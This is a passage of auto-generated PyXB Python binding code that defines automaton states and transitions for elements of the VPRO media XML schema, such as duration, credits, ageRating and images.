st_18 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_18)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_17, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'releaseYear')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
st_19 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_19)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_18, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
st_20 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_20)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_19, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'credits')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
st_21 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_21)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_20, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'award')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
st_22 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_22)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_21, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'descendantOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
st_23 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_23)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_22, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
st_24 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_24)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_23, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ageRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
st_25 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_25)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_24, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'contentRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
st_26 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_26)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_25, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'email')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
st_27 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_27)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_26, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'website')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
st_28 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_28)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_27, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'twitter')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
st_29 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_29)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_28, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'teletext')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
st_30 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_30)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_29, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'prediction')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
st_31 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_31)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_30, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'locations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
st_32 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_32)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_31, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'relation')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
st_33 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_33)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_32, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'images')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
st_34 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_34)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
transitions.append(fac.Transition(st_8, [
]))
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
transitions.append(fac.Transition(st_11, [
]))
transitions.append(fac.Transition(st_12, [
]))
transitions.append(fac.Transition(st_13, [
]))
transitions.append(fac.Transition(st_14, [
]))
transitions.append(fac.Transition(st_15, [
]))
transitions.append(fac.Transition(st_16, [
]))
transitions.append(fac.Transition(st_17, [
]))
transitions.append(fac.Transition(st_18, [
]))
transitions.append(fac.Transition(st_19, [
]))
transitions.append(fac.Transition(st_20, [
]))
transitions.append(fac.Transition(st_21, [
]))
transitions.append(fac.Transition(st_22, [
]))
transitions.append(fac.Transition(st_23, [
]))
transitions.append(fac.Transition(st_24, [
]))
transitions.append(fac.Transition(st_25, [
]))
transitions.append(fac.Transition(st_26, [
]))
transitions.append(fac.Transition(st_27, [
]))
transitions.append(fac.Transition(st_28, [
]))
transitions.append(fac.Transition(st_29, [
]))
transitions.append(fac.Transition(st_30, [
]))
transitions.append(fac.Transition(st_31, [
]))
transitions.append(fac.Transition(st_32, [
]))
transitions.append(fac.Transition(st_33, [
]))
transitions.append(fac.Transition(st_34, [
]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_4, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_5, False) ]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_6, False) ]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_7, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_7, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_8, True) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_8, False) ]))
st_10._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_9, True) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_9, False) ]))
st_11._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_10, True) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_10, False) ]))
st_12._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_11, True) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_11, False) ]))
st_13._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_12, True) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_12, False) ]))
st_14._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_13, True) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_34, [
